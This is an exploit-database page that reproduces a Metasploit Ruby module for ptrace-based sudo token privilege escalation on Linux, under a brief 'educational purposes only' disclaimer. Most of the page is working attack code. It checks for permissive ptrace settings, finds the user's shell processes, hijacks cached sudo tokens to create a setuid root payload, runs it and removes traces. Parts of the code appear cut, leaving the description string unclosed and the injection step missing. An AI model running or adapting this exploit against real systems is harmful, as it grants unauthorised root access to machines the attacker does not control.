Exploits / Vulnerability Discovered : 2019-09-03 |
Type : local |
Platform : linux
This exploit / vulnerability Ptrace sudo token privilege escalation (metasploit) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Linux::Kernel
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'ptrace Sudo Token Privilege Escalation',
'Description' => %q{
This module attempts to gain root privileges by blindly injecting into
the session user's running shell processes and executing commands by
calling `system()`, in the hope that the process has valid cached sudo
tokens with root privileges.
The system must have gdb installed and permit ptrace.
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
register_file_for_cleanup path
end
def check
if yama_enabled?
vprint_error 'YAMA ptrace scope is restrictive'
return CheckCode::Safe
end
vprint_good 'YAMA ptrace scope is not restrictive'
if command_exists? '/usr/sbin/getsebool'
if cmd_exec("/usr/sbin/getsebool deny_ptrace 2>1 | /bin/grep -q on && echo true").to_s.include? 'true'
vprint_error 'SELinux deny_ptrace is enabled'
return CheckCode::Safe
end
vprint_good 'SELinux deny_ptrace is disabled'
end
unless command_exists? 'sudo'
vprint_error 'sudo is not installed'
return CheckCode::Safe
end
vprint_good 'sudo is installed'
unless command_exists? 'gdb'
vprint_error 'gdb is not installed'
return CheckCode::Safe
end
vprint_good 'gdb is installed'
CheckCode::Detected
end
def exploit
unless check == CheckCode::Detected
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end
if is_root?
unless datastore['ForceExploit']
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
end
end
unless writable? base_dir
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end
if nosuid? base_dir
fail_with Failure::BadConfig, "#{base_dir} is mounted nosuid"
end
print_status 'Searching for shell processes ...'
pids = []
if command_exists? 'pgrep'
cmd_exec("pgrep '^(#{shells.join('|')})$' -u \"$(id -u)\"").to_s.each_line do |pid|
pids << pid.strip
end
else
shells.each do |s|
pidof(s).each {|p| pids << p.strip}
end
end
if pids.empty?
fail_with Failure::Unknown, 'Found no running shell processes'
end
print_good "#{@payload_path} setuid root successfully"
print_status 'Executing payload...'
res = cmd_exec "#{@payload_path} & echo "
vprint_line res
return
end
fail_with Failure::NoAccess, 'Failed to create setuid root shell. Session user has no valid cached sudo tokens.'
end
def on_new_session(session)
if session.type.eql? 'meterpreter'
session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
session.fs.file.rm @payload_path
else
session.shell_command_token "rm -f '#{@payload_path}'"
end
ensure
super
end
end